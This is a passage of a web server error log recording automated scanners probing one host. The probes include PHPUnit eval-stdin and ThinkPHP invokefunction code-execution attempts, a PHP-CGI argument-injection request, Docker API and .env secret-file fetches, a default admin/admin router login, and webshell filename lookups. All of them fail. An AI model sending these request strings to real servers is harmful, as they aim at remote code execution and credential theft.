236#236: *81 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:52 [error] 236#236: *81 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:52 [error] 236#236: *81 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:53 [error] 236#236: *81 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:54 [error] 236#236: *81 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:55 [error] 236#236: *81 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:55 [error] 236#236: *81 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:56 [error] 236#236: *81 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:56 [error] 236#236: *81 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:57 [error] 236#236: *81 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:58 [error] 236#236: *81 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:58 [error] 236#236: *81 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:58 [error] 236#236: *81 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:59 [error] 236#236: *81 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:39:02 [error] 236#236: *81 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:40 [error] 283#283: *246 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:41 [error] 283#283: *246 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:42 [error] 283#283: *246 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:42 [error] 283#283: *246 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:43 [error] 283#283: *246 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:43 [error] 283#283: *246 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:44 [error] 283#283: *246 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:45 [error] 283#283: *246 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:45 [error] 283#283: *246 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:46 [error] 283#283: *246 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:46 [error] 283#283: *246 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:47 [error] 283#283: *246 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:47 [error] 283#283: *246 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:48 [error] 283#283: *246 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:49 [error] 283#283: *246 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:49 [error] 283#283: *246 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:50 [error] 283#283: *246 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:51 [error] 283#283: *246 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:51 [error] 283#283: *246 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:51 [error] 283#283: *246 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:52 [error] 283#283: *246 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:52 [error] 283#283: *246 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:53 [error] 283#283: *246 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:53 [error] 283#283: *246 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:54 [error] 283#283: *246 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:54 [error] 283#283: *246 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:55 [error] 283#283: *246 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:55 [error] 283#283: *246 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:56 [error] 283#283: *246 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:56 [error] 283#283: *246 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:57 [error] 283#283: *246 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:57 [error] 283#283: *246 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:58 [error] 283#283: *246 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:58 [error] 283#283: *246 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:59 [error] 283#283: *246 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:59:59 [error] 283#283: *246 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:00:00 [error] 283#283: *246 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:00:00 [error] 283#283: *246 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:00:01 [error] 283#283: *246 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:00:01 [error] 283#283: *246 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:00:03 [error] 283#283: *246 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 190.242.189.254, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:01:45 [error] 282#282: *259 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:08:09 [error] 298#298: *384 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:16:02 [error] 317#317: *439 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.83.208:80", referrer: "http://91.82.83.208:80/home.asp" +2026/01/22 23:20:40 [error] 319#319: *446 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 23:39:21 [error] 316#316: *510 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 139.5.0.10, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" +2026/01/22 23:52:48 [error] 316#316: *528 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 00:03:05 [error] 316#316: *561 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.197.137, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.83.208" +2026/01/23 00:05:38 [error] 318#318: *2054 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.197.137, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.83.208" +2026/01/23 00:11:54 [error] 318#318: *2057 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 00:21:04 [error] 319#319: *2068 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 00:36:37 [error] 319#319: *2082 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 00:39:11 [error] 319#319: *2085 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 00:39:26 [error] 319#319: *2086 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 01:02:03 [error] 319#319: *2102 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 01:49:56 [error] 316#316: *2154 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 01:51:00 [error] 316#316: *2157 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 02:11:41 [error] 317#317: *2178 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 02:38:03 [error] 317#317: *2198 open() "/var/www/html/.env" failed (2: No such file or directory), client: 111.37.202.6, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 02:38:03 [error] 317#317: *2199 open() "/var/www/html/.env.bak" failed (2: No such file or directory), client: 111.37.202.6, server: localhost-nginx-proxy-manager, request: "GET /.env.bak HTTP/1.1", host: "91.82.83.208" +2026/01/23 02:38:04 [error] 317#317: *2200 open() "/var/www/html/version" failed (2: No such file or directory), client: 111.37.202.6, server: localhost-nginx-proxy-manager, request: "GET /version HTTP/1.1", host: "91.82.83.208" +2026/01/23 02:38:04 [error] 317#317: *2201 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 111.37.202.6, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208" +2026/01/23 02:38:05 [error] 317#317: *2202 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 111.37.202.6, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208" +2026/01/23 02:39:52 [error] 317#317: *2207 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 02:41:13 [error] 317#317: *2209 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 03:02:49 [error] 318#318: *2229 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 20.118.202.209, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "91.82.83.208" +2026/01/23 03:31:10 [error] 318#318: *2286 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 04:22:12 [error] 324#324: *2327 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 04:32:34 [error] 323#323: *2342 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 05:15:12 [error] 323#323: *2372 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 05:17:13 [error] 323#323: *2373 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/rrr.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /rrr.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/kk.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /kk.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/cwclass.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /cwclass.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/wp-admin/js/about.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/goomaogm.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /goomaogm.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/Dede.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /Dede.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/dichku.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /dichku.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/h2a2ck.php" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /h2a2ck.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/yr.PHP" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /yr.PHP HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/Mks3.PhP" failed (2: No such file or directory), client: 52.169.148.186, server: localhost-nginx-proxy-manager, request: "GET /Mks3.PhP HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 05:28:51 [error] 323#323: *2389 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 52.169.148.186, server: 